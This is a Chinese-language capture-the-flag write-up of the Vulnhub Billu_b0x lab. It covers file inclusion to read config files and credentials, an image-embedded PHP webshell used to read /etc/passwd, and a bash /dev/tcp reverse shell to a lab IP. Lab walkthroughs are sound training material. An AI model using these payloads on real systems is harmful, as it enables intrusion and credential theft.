Vulnhub靶场第二关

Vulnhub靶场 Billu_b0x
目标:
Boot to root:从Web应用程序进入虚拟机,并获得root权限.
运行环境:
靶机:使用VMWare打开虚机,网络连接方式设置为net,靶机自动获取IP。
攻击机:同网段下有Windows攻击机,安装有Nmap、Burpsuit、Sqlmap、nc、Python2.7、DirBuster、
AWVS、Nessus等渗透工具,kali攻击机,主要用Windows攻击机完成实验。
1.使用nmap 扫描子网查找可用ip
在这里插入图片描述
2.访问这个ip
在这里插入图片描述
3.发现登录页面但是访问源码没有发现可用漏洞准备爆破目录
在这里插入图片描述
4.可以看到扫描到很多目录,依次访问,访问到test目录时发现问题,需要提供file参数,立刻想到文件包含漏洞
在这里插入图片描述
5.测试文件包含失败,转跳到了192.168.238.129
在这里插入图片描述
6.改变思路,利用burp抓包将get请求变为post请求再次尝试文件包含
在这里插入图片描述
7.包含成功,利用同样的方式查看其他目录
在这里插入图片描述
8.发现数据库账号密码成功登录
账号:billu
密码:b0x_billu
在这里插入图片描述
9.phpmyadmin的默认的配置文件是:config.inc.php,现在我们不知道路径,猜测路径在/var/www/phpmy下,猜测成功并且发现账户:root密码:roottoor
在这里插入图片描述
10.从数据库中获得首页登录账号:biLLu密码:hEx_it
在这里插入图片描述
11.返回首页登录
在这里插入图片描述
12.登陆成功
在这里插入图片描述
13.制作图片马并且上传
Cmd制作马命令:copy 12.jpg/b+1.php/a 12.jpg
上传成功后执行:
POST /panel.php?cmd=cat%20/etc/passwd;ls
load=/uploaded_images/12.jpg&continue=continue
在这里插入图片描述
14.
开始使用nc监听:
1.开启监听nc -lvnp 6666
2.同时利用burp的post请求执行echo “bash -i >& /dev/tcp/192.168.50.140/6666 0>&1” | bash
但是要进行url编码
3.执行python -c 'import pty;pty.spawn("/bin/bash")'命令得到交互shell
在这里插入图片描述
15.提权完成

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值